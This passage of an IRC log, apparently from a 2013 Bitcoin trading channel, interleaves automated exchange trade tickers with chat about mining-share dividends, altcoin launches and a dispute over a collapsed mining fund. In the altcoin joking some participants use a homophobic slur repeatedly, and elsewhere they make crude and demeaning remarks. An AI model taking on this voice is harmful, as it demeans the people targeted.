2.5315 = 5.063 BTC [-] May 30 00:19:38 [BTCTC] [ASICMINER-PT] 1 @ 2.531 BTC [-] May 30 00:19:40 [BTCTC] [ASICMINER-PT] 1 @ 2.531 BTC [-] May 30 00:19:53 [BTCTC] [ASICMINER-PT] 2 @ 2.53 = 5.06 BTC [-] May 30 00:19:58 [BTCTC] [ASICMINER-PT] 15 @ 2.53 = 37.95 BTC [-] May 30 00:20:07 [BTCTC] [ASICMINER-PT] 8 @ 2.552 = 20.416 BTC [+] May 30 00:20:55 [BTCTC] [BTC-BOND] 5 @ 0.0105 = 0.0525 BTC [+] May 30 00:21:40 well whoever made the rejected ripple price bet based on ripplewhatever.com as a price signal May 30 00:21:47 should prolly make it again based on btccharts May 30 00:23:18 everybody talks about the AM divs but YABMC, even though defunct, is 2x higher (slowly decreasing). problem is getting out at your purchase price. https://btct.co/security/B.YABMC May 30 00:24:09 what the hell is yabmc paying divs out from? May 30 00:24:43 ericmuyser kinda my point earlier. May 30 00:25:00 [HAVELOCK] [ASICM] 1 @ 0.0252 BTC [-] May 30 00:25:02 [HAVELOCK] [ASICM] 1 @ 0.0252 BTC [-] May 30 00:25:06 fiat500 you clearly don't understand the concept of btc dividends. May 30 00:25:17 ponzi? May 30 00:25:43 not quite. i am personally fascinated by the thing from an anthropologic perspective. May 30 00:26:00 [HAVELOCK] [ASICM] 1 @ 0.02511 BTC [-] May 30 00:26:04 it's a mishmash of performance, sacrifice to the gods (and for the record most souls in btc have a very shamanistical relarton to btc, their own "reputation" etc) May 30 00:26:09 and other condiments. May 30 00:26:20 it's a decent thesis subject. May 30 00:26:21 LOL May 30 00:26:36 im not even kidding. May 30 00:28:00 [HAVELOCK] [ASICM] 31 @ 0.025101 = 0.7781 BTC [-] May 30 00:28:10 just take the following simple observation : the us plebs think "being mean" is bad juju May 30 00:28:18 and since "your reputation" is basically your juju May 30 00:28:27 i dunno man, i met extremely mean people in new york May 30 00:28:28 thus therefore MPOE-PR "will have bad reputation" May 30 00:28:41 ya but those'd be on SA not on btctalk. May 30 00:28:48 rude and mean are different May 30 00:28:50 diff echos in that chamber. May 30 00:28:55 fair enough May 30 00:29:00 [HAVELOCK] [ASICM] 5 @ 0.025101 = 0.1255 BTC [-] May 30 00:29:00 [HAVELOCK] [ASICM] 32 @ 0.02510001 = 0.8032 BTC [-] May 30 00:29:03 also, thought involved May 30 00:29:24 a rude crack head on the streets is worthless May 30 00:29:39 if mean is the opposite of nice, i dont think it is a useful metric in the world of finance May 30 00:29:42 whether bitcoin or otherwise May 30 00:29:59 [HAVELOCK] [ASICM] 100 @ 0.02529999 = 2.53 BTC [+] May 30 00:30:14 for plenty of peeps bitcoin is the world of their dreams and aspirations May 30 00:30:23 and they being financially illiterate there's no finance included. May 30 00:30:28 ive noticed there is also a cult of personality trend in the community May 30 00:30:50 pretty much all the expectations you'd build on a levy-strauss model are amply represented. May 30 00:30:55 [BTCTC] [TAT.ASICMINER] 2 @ 0.025002 = 0.05 BTC [-] May 30 00:31:06 this may be the best argument in favour of my "thirld world shitholer is teh us" thesis. May 30 00:31:51 [BTCTC] [TAT.ASICMINER] 4 @ 0.025 = 0.1 BTC [-] May 30 00:31:53 [BTCTC] [TAT.ASICMINER] 33 @ 0.025 = 0.825 BTC [-] May 30 00:31:56 tjhere's an entire gift economy involved in mucking up dividends for instance. May 30 00:32:24 (look up the older glbse tradition of people "donating" stuff to their public "venture") May 30 00:32:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.02495 BTC [-] May 30 00:32:43 O_o May 30 00:32:57 [BTCTC] [ASICMINER-PT] 3 @ 2.551 = 7.653 BTC [-] May 30 00:33:09 [BTCTC] [TAT.ASICMINER] 8 @ 0.024903 = 0.1992 BTC [-] May 30 00:33:17 you think i am joking do you. May 30 00:33:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.0249 BTC [-] May 30 00:33:51 There is a instance of that going on right now May 30 00:33:55 indeed. May 30 00:34:01 [HAVELOCK] [ASICM] 45 @ 0.02503 = 1.1264 BTC [-] May 30 00:34:06 what would be the point of that, artificially inflating performance? May 30 00:34:12 you can actually even follow cultural markers by people's community age. May 30 00:34:27 fiat500 the point would be "being a good person", as per the rules of the mystical space. May 30 00:34:59 [HAVELOCK] [ASICM] 15 @ 0.02503 = 0.3755 BTC [-] May 30 00:35:00 in sane world we'd immediately think this is fraud. but to these muppets it's not really it. May 30 00:35:07 doesnt sound like something a sane person would do, unless they had been cooking the books and felt bad about it May 30 00:35:10 they're to mentally simple for it (some at least) May 30 00:35:11 mentally weak people fall into the trap of "what a good guy" May 30 00:35:33 damn your timestamp May 30 00:35:41 [BTCTC] [TAT.ASICMINER] 31 @ 0.025 = 0.775 BTC [+] May 30 00:37:06 21:33 < jborkl> There is a instance of that going on right now May 30 00:37:08 where May 30 00:37:42 first page of a exchange has it as a announcment May 30 00:37:55 sounds like glbse stoopid shit May 30 00:38:16 all you have to do is read glbse and apply it to the future May 30 00:39:15 [BTCTC] [TAT.ASICMINER] 61 @ 0.025 = 1.525 BTC [+] May 30 00:39:46 new alt chain: AmeriCoin May 30 00:39:50 not joking May 30 00:40:01 [HAVELOCK] [ASICM] 50 @ 0.02525598 = 1.2628 BTC [+] May 30 00:40:02 [HAVELOCK] [ASICM] 42 @ 0.02525599 = 1.0608 BTC [+] May 30 00:40:04 [HAVELOCK] [ASICM] 100 @ 0.02529997 = 2.53 BTC [+] May 30 00:40:05 [HAVELOCK] [ASICM] 8 @ 0.02529997 = 0.2024 BTC [+] May 30 00:40:34 so, 35% of the coin is used to subsidize those not smart enough to use it. not joking May 30 00:41:03 jborkl: cant find the announcement May 30 00:41:25 kakobrekla is proof of work coca-cola ? May 30 00:41:33 hehe May 30 00:41:33 wunderbra May 30 00:41:43 everyone copies ltc May 30 00:41:53 [BTCTC] [PAJKA.BOND] 4 @ 0.108 = 0.432 BTC [-] May 30 00:42:29 >Before there was hypercoin, sexcoin, fastcoin etc. there was DragonCoin. Here is your chance to own tens of thousands of coins! The winner will receive 37667.5 DNC. No bid too low! All currencies older than two days accepted. The auction will run for 10 hours. May 30 00:42:30 lol May 30 00:42:45 "All currencies older than two days accepted." May 30 00:42:58 [BTCTC] [PAJKA.BOND] 5 @ 0.10761 = 0.5381 BTC [-] May 30 00:43:03 HAHAHAHA May 30 00:43:05 lmao what May 30 00:43:12 is this run by our tortilla friend ? May 30 00:43:13 https://bitcointalk.org/index.php?topic=219065.0 May 30 00:43:23 sauce May 30 00:43:52 [BTCTC] [TAT.ASICMINER] 21 @ 0.024822 = 0.5213 BTC [-] May 30 00:43:59 2 alc chain posts and im good for hours. May 30 00:44:03 alt* May 30 00:44:08 very concetrated. May 30 00:44:19 100k EuropeCoin (Not launched, yet but statistically there will be a EuropeCoin by the time you read this) May 30 00:44:27 :)) May 30 00:44:47 http://trilema.com/2013/i-have-no-idea-why-rape-is-against-the-law-while-marketing-is-not/#comment-93336 anyone read the book this woman's on about ? May 30 00:44:53 they are going to be like .com < they are all used up and being squatted on May 30 00:44:56 [BTCTC] [PAJKA.BOND] 5 @ 0.10752 = 0.5376 BTC [-] May 30 00:44:59 [BTCTC] [BTC-BOND] 2 @ 0.0105 = 0.021 BTC [+] May 30 00:45:01 [HAVELOCK] [ASICM] 5 @ 0.02529996 = 0.1265 BTC [-] May 30 00:45:02 [HAVELOCK] [ASICM] 3 @ 0.02529996 = 0.0759 BTC [-] May 30 00:45:48 [BTCTC] [ASICMINER-PT] 1 @ 2.549 BTC [-] May 30 00:46:38 well , there is a porncoin - that didnt exist yesterday May 30 00:46:44 AFAIK May 30 00:46:59 [HAVELOCK] [ASICM] 1 @ 0.0252 BTC [-] May 30 00:47:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.025136 BTC [+] May 30 00:48:11 i think it was announced yest May 30 00:48:22 sexcoin? May 30 00:48:25 lmiot May 30 00:49:06 I think sexcoin was yesterday... today is porncoin May 30 00:49:31 a right May 30 00:49:33 so out of date MP, gotta keep up with the devs May 30 00:49:50 controlling people: http://books.google.ca/books?id=4vKdrt8zcBkC&pg=PP6&lpg=PP6&dq=1-58062-569 May 30 00:49:55 when they come up with fagcoin ima buy one May 30 00:50:02 cause you wouldn't want to have 0 fagcoin May 30 00:50:08 I only transact in buttcoins and sometimes I tip in fartoshi's May 30 00:50:22 LOL, running a fagcoin client May 30 00:50:29 fagcoind May 30 00:50:37 [BTCTC] [TAT.ASICMINER] 7 @ 0.025136 = 0.176 BTC [+] May 30 00:50:59 aknap3: I stopped reading at 'printed in canada' May 30 00:51:08 I have better. May 30 00:51:09 funny May 30 00:51:26 I like it here just fine May 30 00:51:27 dub what's wrong with printing at the site you cut the tree ? May 30 00:51:32 you part of the teamster's or something ? May 30 00:51:36 moosecock May 30 00:51:53 butthurt ? May 30 00:52:39 jborkl obviously the fagcoin client will be fagcoinb May 30 00:53:23 I was going to say, they need to make a glbse like exchange for all the idiots to trade this shit on, but then I realized they do May 30 00:53:34 true May 30 00:54:17 buttfunder? May 30 00:54:56 no, the one that has the trollbox May 30 00:56:03 ya the btce russianz totally should be in this chan May 30 00:56:08 they should have named ripple - Herpescoin - you don't know who is going to give you Herpes or or that you might have gotten bad Herpes from someone you don't know May 30 00:56:22 [BTCTC] [TAT.ASICMINER] 12 @ 0.025136 = 0.3016 BTC [+] May 30 00:56:23 [BTCTC] [ASICMINER-PT] 1 @ 2.549 BTC [-] May 30 00:57:16 [BTCTC] [ASICMINER-PT] 1 @ 2.549 BTC [-] May 30 00:58:18 rdponticelli re your forum thing : you're muddying things up. May 30 00:58:36 if you invested 2x btc into gigavps' scam, you are out 99%+ of your investment no matter what. May 30 00:58:55 the fact that he's taken the rest of it through whatever bizzare glbse stuff is a very much unrelated problem. May 30 01:00:00 [HAVELOCK] [ASICM] 1 @ 0.02529996 BTC [+] May 30 01:00:42 mircea_popescu: I'm just stating the fact of what happened May 30 01:00:47 well... no, you aren't. May 30 01:01:00 [HAVELOCK] [SDICE] 1 @ 0.22311 BTC [+] May 30 01:01:02 you gave some douche 20btc for 20 x 5 MH/s bonds. May 30 01:01:12 those bonds, i nthe best of circumstances, are worth .2 BTC today May 30 01:01:39 2x btc are the accrued dividends since you closed the fund, giga paid that May 30 01:01:48 [BTCTC] [ASICMINER-PT] 3 @ 2.549 = 7.647 BTC [-] May 30 01:01:52 [BTCTC] [ASICMINER-PT] 1 @ 2.55 BTC [+] May 30 01:01:55 is it ? how many did you hold ? May 30 01:03:09 That's not the original invest May 30 01:03:09 That's not what I'm claiming May 30 01:03:33 [BTCTC] [TAT.ASICMINER] 5 @ 0.025148 = 0.1257 BTC [+] May 30 01:03:45 ok, so for my curiosity, what was the original investment there ? May 30 01:04:23 2btc per share - if I remember offhand? May 30 01:04:40 Around 116k May 30 01:04:50 jborkl iirc it peaked at 1.6ish May 30 01:04:55 1.5 more like a stable level May 30 01:05:26 rdponticelli 116k what, 116k f.giga.etf = 116 bonds, ~600mh/s ? May 30 01:05:32 back when pirate40 was all the rage May 30 01:05:35 I don't know what was the original investment May 30 01:05:42 [BTCTC] [ASICMINER-PT] 1 @ 2.25 BTC [-] May 30 01:05:55 [BTCTC] [TAT.ASICMINER] 4 @ 0.025148 = 0.1006 BTC [+] May 30 01:06:37 Yeah, 116k etf May 30 01:07:27 what a sad affair that was. May 30 01:07:55 [BTCTC] [PAJKA.BOND] 4 @ 0.10999 = 0.44 BTC [+] May 30 01:08:09 I tried to talk to you... May 30 01:08:27 yeah, i'm not negotating that in may. time to negotiate it was last year, when closure was announced. May 30 01:08:34 out of curiosity mircea_popescu, why did you decide not to follow gigavps' claim process (assuming you didn't, i may have missed something while reading up in the forums) May 30 01:08:41 [BTCTC] [ASICMINER-PT] 1 @ 2.555 BTC [+] May 30 01:09:05 [BTCTC] [ASICMINER-PT] 1 @ 2.25 BTC [-] May 30 01:09:06 [BTCTC] [TAT.ASICMINER] 3 @ 0.024828 = 0.0745 BTC [-] May 30 01:09:08 fiat500 it's a huge discussion which was exhausted last year. im not gonna start over. May 30 01:09:09 That's not what you said back then May 30 01:09:22 http://trilema.com/2012/conversation-discarded-as-worthless/ May 30 01:09:42 [BTCTC] [BASIC-MINING] 1 @ 0.64 BTC [+] May 30 01:09:54 rdponticelli i beg to differ. May 30 01:10:13 Anyway, the situation today is giga is paying... May 30 01:10:18 [BTCTC] [ASICMINER-PT] 2 @ 2.556 = 5.112 BTC [+] May 30 01:10:26 [BTCTC] [PAJKA.BOND] 1 @ 0.109999 BTC [+] May 30 01:10:38 ... a selected list of friends and nefario socks. May 30 01:12:03 I proposed to take care of the process, you declined... May 30 01:12:16 [BTCTC] [ASICMINER-PT] 1 @ 2.557 BTC [+] May 30 01:12:20 To take care myself, I mean May 30 01:12:50 [BTCTC] [TAT.ASICMINER] 11 @ 0.024827 = 0.2731 BTC [-] May 30 01:13:01 [HAVELOCK] [ASICM] 2 @ 0.0252 = 0.0504 BTC [-] May 30 01:13:51 there's two ways to go about things. you can prosecute or negotiate. the time to negotiate was then. sadly the possibilities to prosecute kinda died with the death of the rota, leaving you hanging there too. May 30 01:14:10 i prefer the prostitute method May 30 01:14:20 [BTCTC] [BTC-BOND] 6 @ 0.01011 = 0.0607 BTC [-] May 30 01:14:23 [BTCTC] [BTC-BOND] 10 @ 0.01011 = 0.1011 BTC [-] May 30 01:14:24 [BTCTC] [BTC-BOND] 18 @ 0.010008 = 0.1801 BTC [-] May 30 01:14:26 [BTCTC] [BTC-BOND] 100 @ 0.010008 = 1.0008 BTC [-] May 30 01:14:27 [BTCTC] [BTC-BOND] 50 @ 0.010007 = 0.5004 BTC [-] May 30 01:14:29 [BTCTC] [BTC-BOND] 20 @ 0.010006 = 0.2001 BTC [-] May 30 01:14:30 [BTCTC] [BTC-BOND] 100 @ 0.010005 = 1.0005 BTC [-] May 30 01:14:32 [BTCTC] [BTC-BOND] 9 @ 0.010004 = 0.09 BTC [-] May 30 01:14:32 negotiations is for suckas May 30 01:14:46 [BTCTC] [BTC-BOND] 87 @ 0.010003 = 0.8703 BTC [-] May 30 01:14:54 [BTCTC] [BTC-BOND] 10 @ 0.01 = 0.1 BTC [-] May 30 01:14:58 You can't negotiate if you don't know what's gonna happen May 30 01:14:59 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [-] May 30 01:15:03 need moar trilema pics May 30 01:15:05 [BTCTC] [BTC-BOND] 50 @ 0.01 = 0.5 BTC [-] May 30 01:15:08 again i beg to differ. May 30 01:15:17 there's no point in negotiating if you know what's gonna happen. May 30 01:15:18 [BTCTC] [BTC-BOND] 1 @ 0.00999 BTC [-] May 30 01:15:22 [BTCTC] [BTC-BOND] 40 @ 0.00999 = 0.3996 BTC [-] May 30 01:15:25 [BTCTC] [BTC-BOND] 40 @ 0.00998 = 0.3992 BTC [-] May 30 01:15:30 [BTCTC] [BTC-BOND] 7000 @ 0.00997 = 69.79 BTC [-] May 30 01:15:34 [BTCTC] [BTC-BOND] 5 @ 0.00997 = 0.0499 BTC [-] May 30 01:15:44 that's why plea bargains work before the verdict rather than after. May 30 01:16:40 but that aside, i thought the case was you had a 20ish investment, which is why i mentioned. i see you have a point, so. May 30 01:16:41 are there really russian womens for sale there who can be my wife May 30 01:16:53 how much bitcoin May 30 01:18:13 Look, the thing is simple. You betted that giga wouldn't be paying, I betted that he would... May 30 01:18:52 notrly the way i see it. May 30 01:19:29 If your whole issue was a giant short, it's ok with me May 30 01:19:37 But take care of the responsibility May 30 01:20:12 I congratulate you if you shorted, you made good money May 30 01:20:30 [BTCTC] [TAT.ASICMINER] 5 @ 0.0251 = 0.1255 BTC [+] May 30 01:20:37 the if is spurious however. May 30 01:20:51 [BTCTC] [ASICMINER-PT] 1 @ 2.545 BTC [-] May 30 01:21:10 And if you didn't shorted, you're covered May 30 01:21:13 [BTCTC] [TAT.ASICMINER] 5 @ 0.0251 = 0.1255 BTC [+] May 30 01:21:18 [BTCTC] [TAT.ASICMINER] 3 @ 0.0251 = 0.0753 BTC [+] May 30 01:21:20 So you have no excuse May 30 01:21:40 I'm a reasonable guy May 30 01:22:03 But I hate to be left hanging there... May 30 01:22:21 you're reasonable up to the point where you go "you're covered". but anyway. May 30 01:22:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.0251 BTC [+] May 30 01:23:07 You're, I even tried to bail out you from the process May 30 01:23:24 s/out you/you out/ May 30 01:23:26 Technically it wouldn't costs mircea a lot to claim. But mircea seems to consider signing the stuff and giving his ID a risk. May 30 01:24:30 iguess the moral of the story is that one's well advised to negotiate very early rather than very late on one hand May 30 01:24:36 and that we need a court of some sort on the other. May 30 01:24:54 preferably one that actually works. May 30 01:25:09 Namworld: Well, I can understand that, and that's why I said I could take care of that... May 30 01:25:27 [BTCTC] [RSM] 1 @ 0.005931 BTC [+] May 30 01:26:06 I really thing that between gentlemens there's no need for courts... May 30 01:26:24 But it isn't very polite leave somebody talking alone... May 30 01:26:43 I don't think mircea would be the kind to trust anyone else to process something for him when he owes the stuff to others. May 30 01:27:18 rdponticelli that's what courts do : when one party considers it has a claim and the other party does not, they mediate the dispute May 30 01:27:18 [BTCTC] [BTC-BOND] 3 @ 0.01045 = 0.0314 BTC [+] May 30 01:27:23 there's nothing ungentlemanly about it May 30 01:27:38 I know what courts do May 30 01:27:39 I'm really pissed about that anyway... I don't see claiming as risk. May 30 01:28:00 Namworld that's just an edge of the matter. if i allowed him to do it one day he could stand up in court as a state witness accusing me of conspiracy to commit various crimes. May 30 01:28:05 on the simple strength of that. May 30 01:28:22 just because someone in btc comes up with an idea doesn't mean it actually flies. May 30 01:28:27 I just say that good will is better than courts... May 30 01:29:03 when it works. May 30 01:29:16 Yeah, obviously May 30 01:29:58 [BTCTC] [TAT.ASICMINER] 3 @ 0.025009 = 0.075 BTC [-] May 30 01:30:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.0251 BTC [+] May 30 01:34:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.0251 BTC [+] May 30 01:36:03 [HAVELOCK] [ASICM] 2 @ 0.02519998 = 0.0504 BTC [-] May 30 01:36:59 Usually it works when you're dealing with gentlemans but sadly, only in that case... May 30 01:37:08 [BTCTC] [TAT.ASICMINER] 40 @ 0.02509 = 1.0036 BTC [-] May 30 01:39:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.02509 BTC [-] May 30 01:41:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.02509 BTC [-] May 30 01:41:52 no, the affairs of people progressively become more complex than their ability to comprehend them. meanwhile their revulsion of loss and desire to gain remains strictly oriented. this causes conflict. May 30 01:42:04 gentlemen and peasants alike, it doesn't matter. May 30 01:43:02 [BTCTC] [ASICMINER-PT] 1 @ 2.549 BTC [+] May 30 01:44:29 [BTCTC] [ASICMINER-PT] 1 @ 2.55 BTC [+] May 30 01:44:39 [BTCTC] [ASICMINER-PT] 1 @ 2.524 BTC [-] May 30 01:44:49 [BTCTC] [TAT.ASICMINER] 7 @ 0.02509 = 0.1756 BTC [-] May 30 01:44:54 Ok, so let's build a law system, a court, a police to save everybody from themselves... Oh, wait... May 30 01:45:28 I think I saw something like that somewhere.... May 30 01:45:57 [BTCTC] [TAT.ASICMINER] 3 @ 0.024901 = 0.0747 BTC [-] May 30 01:46:35 [BTCTC] [TAT.ASICMINER] 5 @ 0.02509 = 0.1255 BTC [+] May 30 01:46:40 [BTCTC] [TAT.ASICMINER] 10 @ 0.0249 = 0.249 BTC [-] May 30 01:46:59 yes, great success May 30 01:47:02 ;;ud inaba May 30 01:47:03 http://www.urbandictionary.com/define.php?term=Inaba | Stuck-up Lesbian Roleplayer Typically applied to males who play females in online games and try to hook it up with other females (probably played b... May 30 01:47:12 no, wrong May 30 01:47:28 ahahaha May 30 01:47:35 [BTCTC] [ASICMINER-PT] 1 @ 2.549 BTC [+] May 30 01:47:50 rdponticelli still, disputed stuff will have to be adjudicated somehow. May 30 01:47:51 i dunno where the lesbians are from May 30 01:48:23 [BTCTC] [TAT.ASICMINER] 3 @ 0.02509 = 0.0753 BTC [+] May 30 01:48:39 As far as I'm concerned, disputed stuff should be agreed upon by the interested parties... May 30 01:49:34 [BTCTC] [ASICMINER-PT] 1 @ 2.549 BTC [+] May 30 01:49:51 If somebody doesn't have the good will to reach an agreement, I can write off a debt, what I can't write off is an impression... May 30 01:50:29 [BTCTC] [S.DICE-PT] 1 @ 0.002949 BTC [-] May 30 01:50:51 there;s a difference between a debt and a claim. May 30 01:51:00 [HAVELOCK] [ASICM] 9 @ 0.0251001 = 0.2259 BTC [-] May 30 01:51:01 [HAVELOCK] [ASICM] 57 @ 0.0251 = 1.4307 BTC [-] May 30 01:51:03 [HAVELOCK] [ASICM] 50 @ 0.02502 = 1.251 BTC [-] May 30 01:51:04 [HAVELOCK] [ASICM] 12 @ 0.02500001 = 0.3 BTC [-] May 30 01:51:05 [HAVELOCK] [ASICM] 4 @ 0.025 = 0.1 BTC [-] May 30 01:51:16 [BTCTC] [ASICMINER-PT] 1 @ 2.549 BTC [+] May 30 01:51:19 I remember some blog entry about gpg contracts, talking about people honouring he's word... nice stuf... May 30 01:52:14 [BTCTC] [TAT.ASICMINER] 48 @ 0.02509 = 1.2043 BTC [+] May 30 01:53:34 certainly. May 30 01:55:59 [BTCTC] [TAT.ASICMINER] 10 @ 0.0251 = 0.251 BTC [+] May 30 01:58:59 [HAVELOCK] [ASICM] 1 @ 0.02519994 BTC [+] May 30 02:04:44 [BTCTC] [TAT.ASICMINER] 3 @ 0.025147 = 0.0754 BTC [+] May 30 02:06:00 [BTCTC] [TAT.ASICMINER] 1 @ 0.025148 BTC [+] May 30 02:06:01 [BTCTC] [TAT.ASICMINER] 3 @ 0.025148 = 0.0754 BTC [+] May 30 02:07:00 [BTCTC] [TAT.ASICMINER] 3 @ 0.025148 = 0.0754 BTC [+] May 30 02:07:02 [BTCTC] [TAT.ASICMINER] 5 @ 0.025149 = 0.1257 BTC [+] May 30 02:09:00 [HAVELOCK] [ASICM] 48 @ 0.025 = 1.2 BTC [-] May 30 02:09:07 [BTCTC] [TAT.ASICMINER] 5 @ 0.02515 = 0.1258 BTC [+] May 30 02:09:23 [BTCTC] [S.DICE-PT] 11 @ 0.002949 = 0.0324 BTC [-] May 30 02:09:38 [BTCTC] [BASIC-MINING] 1 @ 0.639 BTC [-] May 30 02:09:59 [HAVELOCK] [ASICM] 10 @ 0.025 = 0.25 BTC [-] May 30 02:10:43 [BTCTC] [CRYPTO-TRADE] 28 @ 0.1999 = 5.5972 BTC [+] May 30 02:10:44 [BTCTC] [TAT.ASICMINER] 10 @ 0.02515 = 0.2515 BTC [+] May 30 02:12:17 [BTCTC] [TAT.ASICMINER] 6 @ 0.02515 = 0.1509 BTC [+] May 30 02:12:59 [HAVELOCK] [ASICM] 2 @ 0.025 = 0.05 BTC [-] May 30 02:13:00 [HAVELOCK] [ASICM] 13 @ 0.025 = 0.325 BTC [-] May 30 02:13:53 oh god i just read about the NYAN thing, man i missed some juicy catastrophes May 30 02:14:15 nyan was pretty good. May 30 02:14:59 [HAVELOCK] [ASICM] 3 @ 0.02519988 = 0.0756 BTC [+] May 30 02:15:00 and usagi was in here earlier too, trolling about java May 30 02:15:38 yeah, some of the funny people of btc history are still active more or less. May 30 02:15:45 usagi went from java love to javascript lover in 5 minutes. it was weird. May 30 02:15:48 [BTCTC] [TAT.ASICMINER] 38 @ 0.02515 = 0.9557 BTC [+] May 30 02:15:51 they're completely different May 30 02:15:59 [HAVELOCK] [ASICM] 4 @ 0.02519988 = 0.1008 BTC [+] May 30 02:16:32 trying to recall what else was pretty good. May 30 02:16:51 all the pirate threads pre-august, especially the mpoe-pr bashing early 2012 are pretty good May 30 02:17:10 the joel katz notions of "shared fault"/cherry truck are pretty decent May 30 02:17:21 [BTCTC] [S.DICE-PT] 1 @ 0.00295 BTC [+] May 30 02:17:43 the fabled bitdaytrade including the epic reddit thread also May 30 02:18:17 skepsidyne integrated node should be read by all aspiring miners/miner investoras May 30 02:19:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.02515 BTC [+] May 30 02:19:35 [BTCTC] [GSDPT] 2 @ 0.003484 = 0.007 BTC [-] May 30 02:19:40 how is reptillia tracking? May 30 02:20:09 dub http://trilema.com/2013/valiant-prince-mp-explores-the-mother-of-all-echo-chambers-a-saga-of-our-times/ May 30 02:20:13 mircea_popescu: this? https://bitcointalk.org/index.php?topic=8167.0 May 30 02:20:19 turns out he was a goon. May 30 02:20:20 these are good candidates for my bitcoin bootup May 30 02:20:33 yes that fiat500 May 30 02:20:49 cablepair was prettygood May 30 02:21:02 epic drunk post bullshit May 30 02:21:06 [BTCTC] [TAT.ASICMINER] 31 @ 0.02515 = 0.7797 BTC [+] May 30 02:21:08 ya that too lol. May 30 02:21:19 fiat500 notice how the may post is last edited november :D May 30 02:22:08 early to mid bfl drama was also pretty decent (they announced summer 2012, since about oct to about jan it was fuicy) May 30 02:22:11 [BTCTC] [CRYPTO-TRADE] 3 @ 0.2 = 0.6 BTC [+] May 30 02:23:35 [BTCTC] [CRYPTO-TRADE] 70 @ 0.2 = 14 BTC [+] May 30 02:25:59 [BTCTC] [S.MPOE-PT] 4 @ 0.000717 = 0.0029 BTC [+] May 30 02:26:33 [BTCTC] [TAT.ASICMINER] 5 @ 0.02515 = 0.1258 BTC [+] May 30 02:30:29 lol@ tortilla May 30 02:32:38 [BTCTC] [BASIC-MINING] 1 @ 0.64 BTC [+] May 30 02:33:59 [HAVELOCK] [ASICM] 2 @ 0.02519981 = 0.0504 BTC [-] May 30 02:36:16 [BTCTC] [TAT.ASICMINER] 2 @ 0.02514 = 0.0503 BTC [-] May 30 02:37:02 [HAVELOCK] [ASICM] 50 @ 0.0251998 = 1.26 BTC [-] May 30 02:43:40 [BTCTC] [PAJKA.BOND] 2 @ 0.10999 = 0.22 BTC [-] May 30 02:45:31 [BTCTC] [S.MPOE-PT] 2 @ 0.000717 = 0.0014 BTC [+] May 30 02:49:53 [BTCTC] [TAT.ASICMINER] 7 @ 0.02514 = 0.176 BTC [-] May 30 02:51:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.02514 BTC [-] May 30 02:51:40 [BTCTC] [TAT.ASICMINER] 28 @ 0.02514 = 0.7039 BTC [-] May 30 02:53:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.02515 BTC [+] May 30 02:57:48 [BTCTC] [GSDPT] 10 @ 0.003397 = 0.034 BTC [-] May 30 02:57:50 [BTCTC] [ASICMINER-PT] 1 @ 2.548999 BTC [-] May 30 02:59:14 [BTCTC] [TAT.ASICMINER] 14 @ 0.025149 = 0.3521 BTC [-] May 30 02:59:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.025149 BTC [-] May 30 03:00:31 [BTCTC] [TAT.ASICMINER] 3 @ 0.025149 = 0.0754 BTC [-] May 30 03:02:36 [BTCTC] [ASICMINER-PT] 2 @ 2.549 = 5.098 BTC [+] May 30 03:03:42 [BTCTC] [TAT.ASICMINER] 3 @ 0.025149 = 0.0754 BTC [-] May 30 03:06:00 [BTCTC] [ASICMINER-PT] 1 @ 2.549 BTC [+] May 30 03:08:03 [MPEX] [S.MPOE] 2866 @ 0.00073502 = 2.1066 BTC [-] May 30 03:08:39 [BTCTC] [S.MPOE-PT] 16 @ 0.000717 = 0.0115 BTC [+] May 30 03:11:59 [HAVELOCK] [ASICM] 1 @ 0.02519962 BTC [-] May 30 03:19:52 [BTCTC] [MININGCO.ETF] 5 @ 0.749 = 3.745 BTC [+] May 30 03:20:11 [BTCTC] [MININGCO.ETF] 1 @ 0.75 BTC [+] May 30 03:20:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.025149 BTC [-] May 30 03:20:50 [BTCTC] [MININGCO.ETF] 8 @ 0.78 = 6.24 BTC [+] May 30 03:22:11 [BTCTC] [TAT.ASICMINER] 2 @ 0.025149 = 0.0503 BTC [-] May 30 03:27:42 [BTCTC] [TAT.ASICMINER] 2 @ 0.025149 = 0.0503 BTC [-] May 30 03:29:06 [BTCTC] [TAT.ASICMINER] 1 @ 0.025149 BTC [-] May 30 03:29:26 [BTCTC] [TAT.ASICMINER] 5 @ 0.025149 = 0.1257 BTC [-] May 30 03:30:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.025149 BTC [-] May 30 03:34:34 [MPEX] [S.MPOE] 9050 @ 0.00073184 = 6.6232 BTC [-] May 30 03:34:36 [MPEX] [S.MPOE] 10100 @ 0.00073138 = 7.3869 BTC [-] May 30 03:36:14 [MPEX] [S.MPOE] 12200 @ 0.00073084 = 8.9162 BTC [-] May 30 03:37:41 [BTCTC] [ASICMINER-PT] 1 @ 2.549999 BTC [+] May 30 03:39:41 [BTCTC] [TAT.ASICMINER] 7 @ 0.025149 = 0.176 BTC [-] May 30 03:41:23 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] May 30 03:42:49 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] May 30 03:43:03 [BTCTC] [TAT.ASICMINER] 11 @ 0.02515 = 0.2767 BTC [+] May 30 03:49:14 [BTCTC] [TAT.ASICMINER] 35 @ 0.02515 = 0.8803 BTC [+] May 30 03:54:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.0251 BTC [-] May 30 03:54:03 http://www.youtube.com/watch?v=COKXncOTcao May 30 03:54:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.0251 BTC [-] May 30 03:54:07 [BTCTC] [TAT.ASICMINER] 45 @ 0.02509 = 1.1291 BTC [-] May 30 03:54:10 [BTCTC] [TAT.ASICMINER] 2 @ 0.025 = 0.05 BTC [-] May 30 03:54:24 Pastor Dowell raps about bitcoin May 30 03:55:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.02515 BTC [+] 